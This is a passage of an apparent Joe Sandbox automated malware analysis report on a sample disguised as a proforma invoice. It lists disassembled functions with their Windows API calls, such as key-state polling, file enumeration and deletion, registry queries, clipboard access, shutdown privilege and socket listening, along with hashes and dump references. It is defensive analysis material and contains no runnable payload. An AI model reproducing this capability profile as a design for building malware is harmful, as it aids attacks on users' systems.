                                                                                                                    • Instruction Fuzzy Hash: 8D727075E20219DBDF14CF58C8447AEB7B5FF45320F1481AAE909EB290EB709DA1CB90
                                                                                                                    Function 002BF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 002BF113
                                                                                                                    • _wcscmp.LIBCMT ref: 002BF128
                                                                                                                    • _wcscmp.LIBCMT ref: 002BF13F
                                                                                                                      • Part of subcall function 002B4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002B43A0
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 002BF16E
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002BF179
                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 002BF195
                                                                                                                    • _wcscmp.LIBCMT ref: 002BF1BC
                                                                                                                    • _wcscmp.LIBCMT ref: 002BF1D3
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002BF1E5
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00308920), ref: 002BF203
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 002BF20D
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002BF21A
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002BF22C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 1824444939-438819550
                                                                                                                    • Opcode ID: b25b67560a35161e78da70f4222f61949b31db64f38841c5c312ba38e6c86d4b
                                                                                                                    • Instruction ID: e1e3d4a7d2d87ec3b66f11922ecbd4bcded80700487fd5792c3ad8cf2ff2b909
                                                                                                                    • Opcode Fuzzy Hash: b25b67560a35161e78da70f4222f61949b31db64f38841c5c312ba38e6c86d4b
                                                                                                                    • Instruction Fuzzy Hash: 1131183691121A7ACB50EF74ED49EEE77AC9F493A0F104172EC44E20A0DB30DE65CE58
                                                                                                                    Function 002BA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002BA20F
                                                                                                                    • __swprintf.LIBCMT ref: 002BA231
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 002BA26E
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 002BA293
                                                                                                                    • _memset.LIBCMT ref: 002BA2B2
                                                                                                                    • _wcsncpy.LIBCMT ref: 002BA2EE
                                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 002BA323
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 002BA32E
                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 002BA337
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 002BA341
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                    • API String ID: 2733774712-3457252023
                                                                                                                    • Opcode ID: 90fc25df0f2603f4c87cb3307b4cbe8186c0b6b381d5a0c722d2331c17febb34
                                                                                                                    • Instruction ID: 4885ac28d750120fc84f5095c2d71c931cedc43a7830c0b481f41b79ccf381eb
                                                                                                                    • Opcode Fuzzy Hash: 90fc25df0f2603f4c87cb3307b4cbe8186c0b6b381d5a0c722d2331c17febb34
                                                                                                                    • Instruction Fuzzy Hash: 0E31B4B191014AABDB21DFA4DC49FEB37BCEF89740F1441B6F909D2160EB709B548B25
                                                                                                                    Function 002B001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?), ref: 002B0097
                                                                                                                    • SetKeyboardState.USER32(?), ref: 002B0102
                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 002B0122
                                                                                                                    • GetKeyState.USER32(000000A0), ref: 002B0139
                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 002B0168
                                                                                                                    • GetKeyState.USER32(000000A1), ref: 002B0179
                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 002B01A5
                                                                                                                    • GetKeyState.USER32(00000011), ref: 002B01B3
                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 002B01DC
                                                                                                                    • GetKeyState.USER32(00000012), ref: 002B01EA
                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 002B0213
                                                                                                                    • GetKeyState.USER32(0000005B), ref: 002B0221
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 541375521-0
                                                                                                                    • Opcode ID: fc0a4a8eec429f9a03c5cb97456fa99d648e9ca7bad8c20e3d4c44cd01ef4c13
                                                                                                                    • Instruction ID: 339b3f95cf062268819ccefe475c162430181db02f6c5dc0d7b45869bc533c30
                                                                                                                    • Opcode Fuzzy Hash: fc0a4a8eec429f9a03c5cb97456fa99d648e9ca7bad8c20e3d4c44cd01ef4c13
                                                                                                                    • Instruction Fuzzy Hash: DA510E2091438919FB36EFA488947EBBFB49F013C0F48459A89C6561C3DA54AB9CCB61
                                                                                                                    Function 002D03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002D0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002CFDAD,?,?), ref: 002D0E31
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D04AC
                                                                                                                      • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
                                                                                                                      • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002D054B
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002D05E3
                                                                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 002D0822
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 002D082F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1240663315-0
                                                                                                                    • Opcode ID: da5cf6813690cfcf80bb17b21fc93bde88e482b8d3d885762d8eb4e0d9129e26
                                                                                                                    • Instruction ID: 1a2b65f91cb11375ac0517ba1156c6a24c054188c5e2050309c90b7508724d2a
                                                                                                                    • Opcode Fuzzy Hash: da5cf6813690cfcf80bb17b21fc93bde88e482b8d3d885762d8eb4e0d9129e26
                                                                                                                    • Instruction Fuzzy Hash: 9DE14C31614201AFCB14DF24C995E2ABBE8EF89314F04856EF84ADB361DA30ED55CF92
                                                                                                                    Function 002C83BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
                                                                                                                      • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
                                                                                                                    • CoInitialize.OLE32 ref: 002C8403
                                                                                                                    • CoUninitialize.OLE32 ref: 002C840E
                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,002E2BEC,?), ref: 002C846E
                                                                                                                    • IIDFromString.OLE32(?,?), ref: 002C84E1
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 002C857B
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 002C85DC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                    • API String ID: 834269672-1287834457
                                                                                                                    • Opcode ID: 3ed3fb630ee125350ed45fb32dc148d66ac2072d9d99c07a2c32d88dbe6d6355
                                                                                                                    • Instruction ID: 34220ed93671c733f339f7df2a74d5aed130008279446cc97b191d212b8357c6
                                                                                                                    • Opcode Fuzzy Hash: 3ed3fb630ee125350ed45fb32dc148d66ac2072d9d99c07a2c32d88dbe6d6355
                                                                                                                    • Instruction Fuzzy Hash: 1761C070628312DFC710DF14D848F6AB7E8AF49754F448A1DF9869B291CBB0ED58CB92
                                                                                                                    Function 002C4164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1737998785-0
                                                                                                                    • Opcode ID: c57d973874d4fb8e2f4d04ab1f3b473f3557a902e464ccba07c16ac1917b6aba
                                                                                                                    • Instruction ID: fa4c83d7b2ef6c418f29d8f7205998a56a575d65d0c437bb51121b49964feb94
                                                                                                                    • Opcode Fuzzy Hash: c57d973874d4fb8e2f4d04ab1f3b473f3557a902e464ccba07c16ac1917b6aba
                                                                                                                    • Instruction Fuzzy Hash: BB21AD356122109FDB10AF20ED1DF6A7BA8EF44311F04802AFD469B2A1DB70ED50CF89
                                                                                                                    Function 002B37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00254750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00254743,?,?,002537AE,?), ref: 00254770
                                                                                                                      • Part of subcall function 002B4A31: GetFileAttributesW.KERNEL32(?,002B370B), ref: 002B4A32
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 002B38A3
                                                                                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 002B394B
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 002B395E
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 002B397B
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 002B399D
                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 002B39B9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 4002782344-1173974218
                                                                                                                    • Opcode ID: 70444dfae57da43b75b5cdadb32957e5e6b86fad370db9426edcd74c556a8ff6
                                                                                                                    • Instruction ID: a6a7599b8ec14eaf56dad3e9873166493ce05e7446106deb48724f88c158d824
                                                                                                                    • Opcode Fuzzy Hash: 70444dfae57da43b75b5cdadb32957e5e6b86fad370db9426edcd74c556a8ff6
                                                                                                                    • Instruction Fuzzy Hash: 24518D3182514DAACF01EBA0DA929FDB778AF14341F604069E802771A2EF316F2DCF65
                                                                                                                    Function 002BF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 002BF440
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 002BF470
                                                                                                                    • _wcscmp.LIBCMT ref: 002BF484
                                                                                                                    • _wcscmp.LIBCMT ref: 002BF49F
                                                                                                                    • FindNextFileW.KERNEL32(?,?), ref: 002BF53D
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002BF553
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 713712311-438819550
                                                                                                                    • Opcode ID: 4161a2664e4a02bec56de9a5951abfd606c7dbded5a8dd268443c2bd44abec42
                                                                                                                    • Instruction ID: 082d74a5fb245f4b76e2befcdff76ef3400b8a2a85e593a28ab5b63aab7dde44
                                                                                                                    • Opcode Fuzzy Hash: 4161a2664e4a02bec56de9a5951abfd606c7dbded5a8dd268443c2bd44abec42
                                                                                                                    • Instruction Fuzzy Hash: 2041B17182021AAFCF90DF64DD49AEEBBB4FF05350F544066E815A3191EB309E64CF94
                                                                                                                    Function 00263030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __itow__swprintf
                                                                                                                    • String ID: 3c&$_&
                                                                                                                    • API String ID: 674341424-1388094336
                                                                                                                    • Opcode ID: 815c600a12a24d6e41e9b29ae69a6a432efc84f3c89c057a86767679468f8341
                                                                                                                    • Instruction ID: 872db56d419d2680007cb578047565e32805193138434de91fb57a025421ab12
                                                                                                                    • Opcode Fuzzy Hash: 815c600a12a24d6e41e9b29ae69a6a432efc84f3c89c057a86767679468f8341
                                                                                                                    • Instruction Fuzzy Hash: E6229D716283019FCB24DF24C885B6EB7E4BF84314F14491DF89A97291DB71E9A8CF92
                                                                                                                    Function 00265760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4104443479-0
                                                                                                                    • Opcode ID: 8f8991a06219e0e06e66e24f17ac9db5adc7c8cb31369099385e974e3add39a7
                                                                                                                    • Instruction ID: 8018a2385ffe9131fb488d475a7b4e2eadf17f603ff3e8e6b2c2ae147983ac6f
                                                                                                                    • Opcode Fuzzy Hash: 8f8991a06219e0e06e66e24f17ac9db5adc7c8cb31369099385e974e3add39a7
                                                                                                                    • Instruction Fuzzy Hash: 93129B70A2061ADFDF04DFA5D981AAEB3F5FF48300F104529E806A7291EB35AD64CB94
                                                                                                                    Function 002B3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00254750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00254743,?,?,002537AE,?), ref: 00254770
                                                                                                                      • Part of subcall function 002B4A31: GetFileAttributesW.KERNEL32(?,002B370B), ref: 002B4A32
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 002B3B89
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 002B3BD9
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 002B3BEA
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002B3C01
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002B3C0A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                                    • Opcode ID: 4338271a1102688a1077cfbf8e8c3fca4e14e1de12ea5e7aa7cb5902040ba2b5
                                                                                                                    • Instruction ID: da40a7acc53fe3f822b62efa094550fe69f607757239587d584944d28938c9ad
                                                                                                                    • Opcode Fuzzy Hash: 4338271a1102688a1077cfbf8e8c3fca4e14e1de12ea5e7aa7cb5902040ba2b5
                                                                                                                    • Instruction Fuzzy Hash: 2D3192310693859FC301EF64D8958EFBBA8AE51305F404E2EF8D592191EB31DA1CCB5B
                                                                                                                    Function 002B51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002A87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A882B
                                                                                                                      • Part of subcall function 002A87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A8858
                                                                                                                      • Part of subcall function 002A87E1: GetLastError.KERNEL32 ref: 002A8865
                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 002B51F9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                    • String ID: $@$SeShutdownPrivilege
                                                                                                                    • API String ID: 2234035333-194228
                                                                                                                    • Opcode ID: d1a52490b09a74146ab7467ea4f6e3be569a8ad3222952898359a772b5877f04
                                                                                                                    • Instruction ID: fc9a699d304f79ae79ae69d53c28c81c8cc330ff5c3651deae8506de1c5a34ee
                                                                                                                    • Opcode Fuzzy Hash: d1a52490b09a74146ab7467ea4f6e3be569a8ad3222952898359a772b5877f04
                                                                                                                    • Instruction Fuzzy Hash: 5B01FC316B36225BE7286668AC9BFF773589B057C0F144421FD57DA0D1D9911C204994
                                                                                                                    Function 002C6283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 002C62DC
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 002C62EB
                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 002C6307
                                                                                                                    • listen.WSOCK32(00000000,00000005), ref: 002C6316
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 002C6330
                                                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 002C6344
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
